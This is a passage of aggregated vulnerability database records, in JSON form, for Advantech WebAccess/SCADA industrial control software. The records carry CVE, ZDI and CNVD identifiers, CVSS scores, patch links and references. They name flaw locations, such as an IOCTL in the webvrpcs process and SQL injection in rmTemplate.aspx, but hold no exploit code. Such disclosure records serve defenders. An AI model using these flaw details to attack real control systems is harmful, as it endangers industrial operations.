"https://www.cnvd.org.cn/patchInfo/show/101164" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74364" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "CNNVD", "id": "CNNVD-201708-1275" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-732", "trust": 1.1 }, { "problemtype": "CWE-264", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103263" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "NVD", "id": "CVE-2017-12713" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12713" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12713" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-713" }, { "db": "CNVD", "id": "CNVD-2017-23880" }, { "db": "VULHUB", "id": "VHN-103263" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007577" }, { "db": "CNNVD", "id": "CNNVD-201708-1275" }, { "db": "NVD", "id": "CVE-2017-12713" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f", "ident": null }, { "db": "ZDI", "id": "ZDI-17-713", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-23880", "ident": null }, { "db": "VULHUB", "id": "VHN-103263", "ident": null }, { "db": "BID", "id": "100526", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-007577", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201708-1275", "ident": null }, { "db": "NVD", "id": "CVE-2017-12713", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "2f47a910-cf77-46d0-b79d-4a34cb7b5c3f", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "ZDI", "id": "ZDI-17-713", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23880", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103263", "ident": null }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526", "ident": null }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007577", "ident": null }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1275", "ident": null }, { "date": "2017-08-30T18:29:00.967000", "db": "NVD", "id": "CVE-2017-12713", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-30T00:00:00", "db": "ZDI", "id": "ZDI-17-713", "ident": null }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23880", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103263", "ident": null }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526", "ident": null }, { "date": "2017-12-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007577", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1275", "ident": null }, { "date": "2024-11-21T03:10:04.857000", "db": "NVD", "id": "CVE-2017-12713", "ident": null } ] }, "threat_type": { "_id": null, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1275" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Vulnerabilities related to authorization, permissions, and access control", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007577" } ], "trust": 0.8 }, "type": { "_id": null, "data": "permissions and access control issues", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1275" } ], "trust": 0.6 } }
var-201906-1029
Vulnerability from variot
In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 10.5, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.5" }, { "_id": null, "model": "webaccess/scada", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.5" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "NVD", "id": "CVE-2019-10993" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" } ], "trust": 9.8 }, "cve": "CVE-2019-10993", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-10993", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-32473", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10993", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 10.5, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-10993", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "ZDI", "id": "CVE-2019-10993", "trust": 10.5, "value": "CRITICAL" }, { "author": "nvd@nist.gov", "id": "CVE-2019-10993", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2019-32473", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201906-1077", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07", "trust": 0.2, "value": "CRITICAL" } ] } ], "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "CNNVD", "id": "CNNVD-201906-1077" }, { "db": "NVD", "id": "CVE-2019-10993" } ] }, "description": { "_id": null, "data": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2019-10993" }, { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" } ], "trust": 11.07 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2019-10993", "trust": 12.9 }, { "db": "ZDI", "id": "ZDI-19-613", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-616", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-606", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-598", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-615", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-601", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-607", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-597", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-618", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-623", "trust": 2.3 }, { "db": "ZDI", "id": "ZDI-19-612", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-603", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-614", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-602", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-617", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-605", "trust": 1.6 }, { "db": "ZDI", "id": "ZDI-19-611", "trust": 1.6 }, { "db": "ICS CERT", "id": "ICSA-19-178-05", "trust": 1.6 }, { "db": "CNVD", "id": "CNVD-2019-32473", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201906-1077", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8129", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-599", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8146", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8143", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-610", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8150", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8139", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8128", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8142", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-609", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8130", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-600", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8116", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-19-593", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8148", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8133", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8140", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8127", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8152", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-8119", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.2350", "trust": 0.6 }, { "db": "BID", "id": "108923", "trust": 0.6 }, { "db": "IVD", "id": "D5DCD84F-1ACA-4DC3-AC16-D5C7C3DD4D07", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "CNNVD", "id": "CNNVD-201906-1077" }, { "db": "NVD", "id": "CVE-2019-10993" } ] }, "id": "VAR-201906-1029", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "CNVD", "id": "CNVD-2019-32473" } ], "trust": 1.34667458 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "CNVD", "id": "CNVD-2019-32473" } ] }, "last_update_date": "2024-11-29T22:51:20.239000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 10.5, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "title": "Patch for Advantech WebAccess/SCADA arbitrary code execution vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/181487" }, { "title": "Advantech WebAccess/SCADA Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=94180" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "CNNVD", "id": "CNNVD-201906-1077" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2019-10993" } ] }, "references": { "_id": null, "data": [ { "trust": 12.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "trust": 2.2, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-623/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-597/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-611/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-601/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-612/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-598/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-615/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-605/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-616/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-602/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-613/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-603/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-614/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-606/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-617/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-607/" }, { "trust": 1.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-618/" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10993" }, { "trust": 0.6, "url": "http://webaccess.advantech.com" }, { "trust": 0.6, "url": "https://www.securityfocus.com/bid/108923" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2350/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-599" }, { "db": "ZDI", "id": "ZDI-19-613" }, { "db": "ZDI", "id": "ZDI-19-610" }, { "db": "ZDI", "id": "ZDI-19-616" }, { "db": "ZDI", "id": "ZDI-19-606" }, { "db": "ZDI", "id": "ZDI-19-598" }, { "db": "ZDI", "id": "ZDI-19-609" }, { "db": "ZDI", "id": "ZDI-19-600" }, { "db": "ZDI", "id": "ZDI-19-593" }, { "db": "ZDI", "id": "ZDI-19-615" }, { "db": "ZDI", "id": "ZDI-19-601" }, { "db": "ZDI", "id": "ZDI-19-607" }, { "db": "ZDI", "id": "ZDI-19-597" }, { "db": "ZDI", "id": "ZDI-19-618" }, { "db": "ZDI", "id": "ZDI-19-623" }, { "db": "CNVD", "id": "CNVD-2019-32473" }, { "db": "CNNVD", "id": "CNNVD-201906-1077" }, { "db": "NVD", "id": "CVE-2019-10993" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07", "ident": null }, { "db": "ZDI", "id": "ZDI-19-599", "ident": null }, { "db": "ZDI", "id": "ZDI-19-613", "ident": null }, { "db": "ZDI", "id": "ZDI-19-610", "ident": null }, { "db": "ZDI", "id": "ZDI-19-616", "ident": null }, { "db": "ZDI", "id": "ZDI-19-606", "ident": null }, { "db": "ZDI", "id": "ZDI-19-598", "ident": null }, { "db": "ZDI", "id": "ZDI-19-609", "ident": null }, { "db": "ZDI", "id": "ZDI-19-600", "ident": null }, { "db": "ZDI", "id": "ZDI-19-593", "ident": null }, { "db": "ZDI", "id": "ZDI-19-615", "ident": null }, { "db": "ZDI", "id": "ZDI-19-601", "ident": null }, { "db": "ZDI", "id": "ZDI-19-607", "ident": null }, { "db": "ZDI", "id": "ZDI-19-597", "ident": null }, { "db": "ZDI", "id": "ZDI-19-618", "ident": null }, { "db": "ZDI", "id": "ZDI-19-623", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-32473", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201906-1077", "ident": null }, { "db": "NVD", "id": "CVE-2019-10993", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-09-21T00:00:00", "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-599", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-613", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-610", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-616", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-606", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-598", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-609", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-600", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-593", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-615", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-601", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-607", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-597", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-618", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-623", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32473", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1077", "ident": null }, { "date": "2019-06-28T21:15:11.353000", "db": "NVD", "id": "CVE-2019-10993", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-599", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-613", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-610", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-616", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-606", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-598", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-609", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-600", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-593", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-615", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-601", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-607", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-597", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "ZDI", "id": "ZDI-19-618", "ident": null }, { "date": "2024-01-19T00:00:00", "db": "ZDI", "id": "ZDI-19-623", "ident": null }, { "date": "2019-09-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-32473", "ident": null }, { "date": "2022-04-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1077", "ident": null }, { "date": "2024-11-21T04:20:18.740000", "db": "NVD", "id": "CVE-2019-10993", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1077" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA Arbitrary code execution vulnerability", "sources": [ { "db": "IVD", "id": "d5dcd84f-1aca-4dc3-ac16-d5c7c3dd4d07" }, { "db": "CNVD", "id": "CNVD-2019-32473" } ], "trust": 0.8 }, "type": { "_id": null, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1077" } ], "trust": 0.6 } }
var-201708-1124
Vulnerability from variot
A SQL Injection issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. By submitting a specially crafted parameter, it is possible to inject arbitrary SQL statements that could allow an attacker to obtain sensitive information. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within rmTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "526eff5a-fc92-4271-a592-23146544e85e" }, { "db": "ZDI", "id": "ZDI-17-712" }, { "db": 